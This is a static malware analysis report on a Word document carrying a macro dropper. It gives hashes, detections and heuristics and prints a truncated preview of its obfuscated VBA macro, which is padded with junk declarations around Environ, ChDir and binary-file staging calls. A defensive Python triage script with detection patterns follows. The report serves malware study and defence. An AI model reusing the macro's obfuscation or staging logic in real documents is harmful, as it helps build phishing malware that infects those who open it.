Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 49303ee1dd10a23c…

MALICIOUS

Office (OLE)

Size: 4.67 MB
Created: 2020-08-24 06:52:00
Authoring application: Microsoft Office Word
First seen: 2020-09-04
MD5: d6bb808b52a7dd0b1897904851eddae4
SHA-1: b7ea8f182792e226442c79330bc7da821a84d838
SHA-256: 49303ee1dd10a23c5fccd5ef4559ffbbd3e03b2adc4ec37175eb52ada1ad0bd7
Risk score: 130

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

ClamAV flags the file with the signature Xls.Dropper.Agent-9537719-0 (the Xls. prefix is part of ClamAV's family name; the container itself is a Word OLE document according to the authoring-application metadata). The file contains VBA macros, including a Document_Open handler, which runs automatically when the document is opened and is the standard entry point for macro-based malware. The extracted macro source is padded with hundreds of unused Dim declarations under random dictionary-word names, a common obfuscation technique; once those are stripped, the visible logic reads an environment variable with Environ(), changes the working directory to that path with ChDir, and opens a file for binary access (Open ... For Binary As #97, later Close #97), i.e. it stages a file on disk, which is consistent with the dropper classification. The preview is truncated, so the payload source and what is written to that file are not visible here, and none of the extracted URLs is referenced from macro code (all were found in the document body text), so a download stage cannot be confirmed from this static analysis alone.

Heuristics (5)

  • ClamAV: Xls.Dropper.Agent-9537719-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Agent-9537719-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL label says which channel (macro, JS, link annotation, document body, ...) reached each URL. Every URL below carries the same label, "In document text (OLE body)", i.e. it was found in the body text and not in macro code:
    • http://www.libgd.org/Documentation
    • http://www.libgd.org/
    • http://www.libgd.org
    • http://localhost/labelmaker
    • http://localhost/~yourname/testwebsite
    • http://www.gnu.org/software/libc/manual/
    • http://bookboon.com/count/advert/eba1fd82-96d7-e011-adca-22a08ed629e5
    • http://bookboon.com/count/advert/69a0fd82-96d7-e011-adca-22a08ed629e5
    • http://dev.mysql.com/doc/refman/5.1/en/index.html
    • http://bookboon.com/count/advert/0d9efd82-96d7-e011-adca-22a08ed629e5
    • http://httpd.apache.org/docs/2.2/developer/
    • http://bookboon.com/count/advert/739ffd82-96d7-e011-adca-22a08ed629e5
    • http://bookboon.com/count/advert/52a1fd82-96d7-e011-adca-22a08ed629e5
    • http://bookboon.com/count/advert/11a3fd82-96d7-e011-adca-22a08ed629e5
    • http://bookboon.com/count/advert/9b9dfd82-96d7-e011-adca-22a08ed629e5
    • http://bookboon.com/count/advert/aea1fd82-96d7-e011-adca-22a08ed629e5
    • http://bookboon.com/count/
    • http://bookboon.com/count/advert/67a2fd82-96d7-e011-adca-22a08ed629e5
    • http://schemas.openxmlformats.org/drawingml/2006/main
    • http://khoiriyyah.blogspot.com/2012/06/vb6-hash-class-md5-sha-1-sha-256-sha.html

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 19980 bytes
SHA-256: eab717d5207edd4ce33ea69007bd0957717cf3179eedfb084939c27091f3aacf
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub dirigibles(Roussillon)
On Error Resume Next
Dim Zadokabruptness As Integer
Dim Sholapurcalmative As String
Dim caiqueFairbanks As Long
Dim bushmandene As Boolean
Dim charactersalisma As String
Dim Sinhalesediscant As Variant
Dim apprehensivenessbleb As Variant
Dim cocoaellipsographs As String
Dim curettementdelimitative As Boolean
Dim Faroesedetoxicants As Boolean
Dim compeersDouai As Variant
Dim disposalDukas As Variant

Close #97
End Sub
Sub Messalina(Roussillon)
On Error Resume Next
Dim cromlechJoni As Variant
Dim electromotorsElamites As Variant
Dim apportionmentsawes As Boolean
Dim burlapsantitype As Boolean
Dim artillerybarbarisations As Variant

Open Roussillon For Binary As #97
Dim amazesduma As Variant
Dim charmsCaspian As Boolean
Dim IcarusAssisi As Boolean
Dim LeonardHammerfest As Boolean
Dim SamanthaVicksburg As Integer
Dim corporalitydray As Boolean

End Sub
Sub doublefacednessHerculesclub(doublefacedness)
On Error Resume Next
Dim number_unbookmark As String
Dim custodiansAzerbaijanis As Boolean
Dim dengueMargate As Long
Dim deistWedekind As Boolean
Dim deterrentsantidepressants As Long
Dim accentingaune As Long
Dim auntiescarrousel As Long
Dim convivialistselastin As Integer
Dim accoladesbeluga As Long
Dim carpetingcacodemon As Boolean

Dim doinstall_imgpath As Boolean
Dim confusednesscommentator As String
Dim debaucheesEtonian As Variant
Dim earldomsBehn As String
Dim DumbartonWedgwood As Boolean
Dim doubledealingcriollos As Long
Dim disownmentsairintake As Boolean
Dim derringerdivineness As String
Dim BeaconsfieldSaba As Boolean

number_unbookmark = Environ(doublefacedness)
Dim Fitzroyamis As Boolean
Dim Kathybedchambers As Variant
Dim dodecahedronsdopattas As Boolean
Dim combinesdiaconicon As Long
Dim Tgroupsadversities As Boolean
Dim catabasiselbows As Integer
Dim disguisedisaffirmation As Variant
Dim Christianizerabominations As Long
Dim chicoryanil As Long

ChDir (number_unbookmark)
Dim browsingsareoles As Variant
Dim ageismcerographist As Long
Dim demurconcordances As Long
Dim Atenambuscado As String
Dim chalazionCornish As Integer
Dim SchmidtVigo As String
Dim contrapositiveRotherham As String

End Sub
Sub effluencebellworts(Orion, Orvieto, Foxe)
On Error Resume Next
Dim demoralisationbenzoyls As String
Dim costarsdeterminist As Integer
Dim apostatescitoles As Boolean
Dim cornhuskingGigi As String
Dim Sanctusbroody As Variant
Dim arguingSarthe As Long
Dim biofeedbackeffortlessness As String
Dim bentsdiaphoretic As Long
Dim economieschamfron As String
Dim economiserscarcinogenicity As Variant
Dim Somaliachillings As Long

Dim addatabases As Long
Dim RieslingAztecs As Long
Dim calluschippie As Long
Dim GaliciaGotham As Integer
Dim amiceecru As Variant
Dim denominationsdisharmonies As String
Dim buskinapricots As String
Dim Lovelacebathymetry As Integer

Dim doinstall_imgpath As Boolean
Dim GLOBALS_break As Words
Dim beneficenceclockworks As String
Dim deletionsboxwoods As Integer
Dim Godwincontraprops As String
Dim AladdinClytemnestra As Integer
Dim circumfusionbigarades As Integer
Dim carritchattaintures As Long

Set GLOBALS_break = ThisDocument.Words
updates_read = "-"
On Error Resume Next
Dim ananasdandyism As String
Dim alkalescenciesanthem As Long
Dim Onassisboon As Boolean
Dim Stevenageblackamoor As String
Dim Quirinusdimwits As Boolean
Dim bondersaeronauts As Long

Dim groupIdshop As String
Dim cassiaGanesa As Long
Dim ablationsalkalis As String
Dim ashlarsJews As Boolean
Dim barbotineclip As String
Dim decorticationSwedish As Integer
Dim antependiumassistance As String
Dim baggingsUlric As Boolean
Dim Vergilcadencies As Boolean
Dim aerogrammePontormo As String

Dim resetheader_mess
... (truncated)
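The macro preview above is dominated by padding: hundreds of Dim lines whose variables are never used, interleaved with the few statements that matter (Environ, ChDir, Open ... For Binary). The following triage helper is an added example, not part of this report or of oletools; it works on the VBA text olevba has already extracted (the macros.bas artifact listed above), strips declarations that are never referenced, and then lists auto-exec entry points and the indicators discussed in the Malware Insights section. The sample module embedded in it is constructed to mirror the preview; the Document_Open body (calling the two helper subs) is an assumption for illustration, since the real entry point is not visible in the truncated preview, and the indicator list and labels are this example's own.

```python
"""Triage an olevba-extracted VBA module: strip junk declarations, find
auto-exec entry points and suspicious calls.  Added example, not part of the
report or of oletools."""
import re
from collections import Counter

# Constructed sample modelled on the preview above.  The real macro's
# Document_Open body is not visible in the truncated preview, so the one here
# (calling the two helpers) is an assumption for illustration only.
SAMPLE_VBA = """Attribute VB_Name = "ThisDocument"
Sub Document_Open()
On Error Resume Next
Dim Zadokabruptness As Integer
doublefacednessHerculesclub "TEMP"
Messalina "dropped.bin"
End Sub
Sub Messalina(Roussillon)
On Error Resume Next
Dim cromlechJoni As Variant
Open Roussillon For Binary As #97
End Sub
Sub doublefacednessHerculesclub(doublefacedness)
On Error Resume Next
Dim number_unbookmark As String
Dim custodiansAzerbaijanis As Boolean
number_unbookmark = Environ(doublefacedness)
ChDir (number_unbookmark)
End Sub
"""

# Procedure names Office runs automatically (assumed list, Word and Excel).
AUTOEXEC_RE = re.compile(
    r"^\s*(?:Public\s+|Private\s+)?Sub\s+"
    r"(Document_Open|AutoOpen|Auto_Open|Workbook_Open|AutoExec|Document_Close|AutoClose)\b",
    re.I | re.M)

# Indicators worth a closer look; the labels are this example's own.
SUSPICIOUS = {
    "Environ": re.compile(r"\bEnviron\s*\(", re.I),
    "ChDir": re.compile(r"\bChDir\b", re.I),
    "OpenBinary": re.compile(r"\bOpen\b.+\bFor\s+Binary\b", re.I),
    "Shell": re.compile(r"\bShell\s*\(", re.I),
    "CreateObject": re.compile(r"\bCreateObject\s*\(", re.I),
    "OnErrorResumeNext": re.compile(r"^\s*On\s+Error\s+Resume\s+Next\b", re.I),
}
DIM_RE = re.compile(r"^\s*Dim\s+(\w+)(?:\s+As\s+\w+)?\s*$", re.I)
IDENT_RE = re.compile(r"[A-Za-z_]\w*")


def strip_junk_dims(src):
    """Drop 'Dim x As T' lines whose variable is never referenced on any
    non-Dim line, plus the blank lines the padding leaves behind.
    Returns (cleaned_source, number_of_dropped_lines)."""
    lines = src.splitlines()
    declared = {}      # lower-cased name -> indexes of its Dim lines
    used = Counter()   # identifier occurrences outside Dim lines
    for i, line in enumerate(lines):
        m = DIM_RE.match(line)
        if m:
            declared.setdefault(m.group(1).lower(), []).append(i)
        else:
            used.update(ident.lower() for ident in IDENT_RE.findall(line))
    drop = {i for name, idxs in declared.items() if used[name] == 0 for i in idxs}
    kept = [l for i, l in enumerate(lines) if i not in drop and l.strip()]
    return "\n".join(kept) + "\n", len(drop)


def find_autoexec(src):
    """Names of procedures that Office would run without user interaction."""
    return AUTOEXEC_RE.findall(src)


def find_suspicious(src):
    """(label, 1-based line number, stripped line) for every indicator hit."""
    hits = []
    for no, line in enumerate(src.splitlines(), 1):
        for label, rx in SUSPICIOUS.items():
            if rx.search(line):
                hits.append((label, no, line.strip()))
    return hits


def triage(src):
    """Strip padding first so the findings' line numbers point at real code."""
    cleaned, dropped = strip_junk_dims(src)
    autoexec = find_autoexec(cleaned)
    findings = find_suspicious(cleaned)
    # On Error Resume Next alone is not actionable; pair an auto-exec entry
    # point with at least one real indicator before calling it suspicious.
    actionable = [f for f in findings if f[0] != "OnErrorResumeNext"]
    verdict = "suspicious" if autoexec and actionable else "review"
    return {"autoexec": autoexec, "junk_dims_removed": dropped,
            "findings": findings, "verdict": verdict, "cleaned": cleaned}


if __name__ == "__main__":
    result = triage(SAMPLE_VBA)
    print(f"junk Dim lines removed: {result['junk_dims_removed']}")
    print("auto-exec entry points:", ", ".join(result["autoexec"]))
    for label, no, text in result["findings"]:
        print(f"  [{label}] line {no}: {text}")
    print("verdict:", result["verdict"])
```

Run it on the real artifact with `triage(open("macros.bas", encoding="utf-8", errors="replace").read())`; the cleaned source is usually a few dozen lines and is what you actually read. The Dim-stripping is deliberately conservative (a name that appears anywhere outside a Dim line is kept), so it never removes a declaration the code depends on.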